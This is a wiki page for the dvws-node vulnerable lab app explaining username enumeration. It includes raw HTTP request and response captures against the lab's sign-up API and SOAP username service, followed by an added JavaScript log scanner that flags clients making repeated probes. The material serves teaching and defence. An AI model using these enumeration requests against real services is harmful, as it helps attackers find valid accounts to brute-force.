User Enumeration
Sam Sanoop edited this page Aug 7, 2021 · 3 revisions
Username enumeration is a reconnaissance activity in which an attacker tries to retrieve valid usernames from an API or application; those usernames can then be used to conduct a brute-force attack. The areas of an application most vulnerable to this type of attack are login pages, registration pages or password reset pages.

Multiple areas within dvws-node allow enumeration of usernames.
- Login API

```
POST /api/v2/users HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://target.local
Connection: close
Referer: http://target.local/

username=test&password=testsss
```

```
HTTP/1.1 409 Conflict
X-Powered-By: Express
Access-Control-Allow-Origin: http://target.local
Vary: Origin
Access-Control-Allow-Credentials: true
Cache-Control: no-store, no-cache, must-revalidate, private
Content-Type: text/plain
Date: Sat, 07 Aug 2021 22:36:00 GMT
Connection: close
Content-Length: 24

User test already exists
```
- XML-RPC Service

```
POST /dvwsuserservice/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4164.0 Safari/537.36 autochrome/red
Connection: close
SOAPAction: Username
Content-Type: text/xml;charset=UTF-8
Host: dvws.local
Content-Length: 469

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:examples:usernameservice">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:Username soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <username xsi:type="xsd:string">foobar</username>
    </urn:Username>
  </soapenv:Body>
</soapenv:Envelope>
```

```
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/xml; charset=utf-8
Content-Length: 533
ETag: W/"215-4nRSSCqxxAg/myMHLU8p7f/9Ezo"
Date: Fri, 05 Jun 2020 23:54:38 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:examples:helloservice">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:UsernameResponse soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <username xsi:type="xsd:string">User Exists:foobar</username>
    </urn:UsernameResponse>
  </soapenv:Body>
</soapenv:Envelope>
```
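
A defender-side view of the two captures above, as an added example that is not part of dvws-node or of the original wiki page: it scans access-log lines for clients that repeatedly trigger the `409` sign-up conflict or repeatedly call the username SOAP service. The endpoint paths and the `409` status come from the captures; the log line layout, the threshold and window defaults, the function names and the sample lines are constructed assumptions.

```javascript
// Added example, not dvws-node code. Paths and the 409 come from the captures
// above; the log layout, thresholds and sample lines are assumptions.
const WATCHED = [
  { method: 'POST', path: '/api/v2/users', status: 409 },      // conflict reveals a taken name
  { method: 'POST', path: '/dvwsuserservice/', status: null }, // answers 200 either way: count every call
];

// Assumed line layout: "<client> <ISO-8601 time> <method> <path> <status>"
function parseLine(line) {
  const [client, time, method, path, status] = line.trim().split(/\s+/);
  const ts = Date.parse(time);
  if (!client || Number.isNaN(ts) || !/^\d{3}$/.test(status || '')) return null;
  return { client, ts, method, path, status: Number(status) };
}

function isProbe(e) {
  return WATCHED.some(w => w.method === e.method && w.path === e.path &&
    (w.status === null || w.status === e.status));
}

// Flag clients with >= `threshold` watched requests in any `windowMs` sliding window.
function findEnumerators(lines, { threshold = 5, windowMs = 60000 } = {}) {
  const perClient = new Map();
  for (const e of lines.map(parseLine)) {
    if (!e || !isProbe(e)) continue;          // skip unparseable and unrelated lines
    if (!perClient.has(e.client)) perClient.set(e.client, []);
    perClient.get(e.client).push(e.ts);
  }
  const flagged = [];
  for (const [client, times] of perClient) {
    times.sort((a, b) => a - b);
    let start = 0, peak = 0;
    for (let end = 0; end < times.length; end++) {
      while (times[end] - times[start] > windowMs) start++;
      peak = Math.max(peak, end - start + 1); // busiest window seen so far
    }
    if (peak >= threshold) flagged.push({ client, peak });
  }
  return flagged;
}

// Constructed sample: 10.0.0.5 hits six conflicts in 12 s; the others one request each.
const sampleLog = [
  ...[0, 2, 4, 6, 8, 12].map(s =>
    `10.0.0.5 2021-08-07T22:36:${String(s).padStart(2, '0')}Z POST /api/v2/users 409`),
  '10.0.0.9 2021-08-07T22:36:30Z POST /api/v2/users 409',
  '10.0.0.7 2021-08-07T22:37:00Z POST /dvwsuserservice/ 200',
];
console.log(findEnumerators(sampleLog));
```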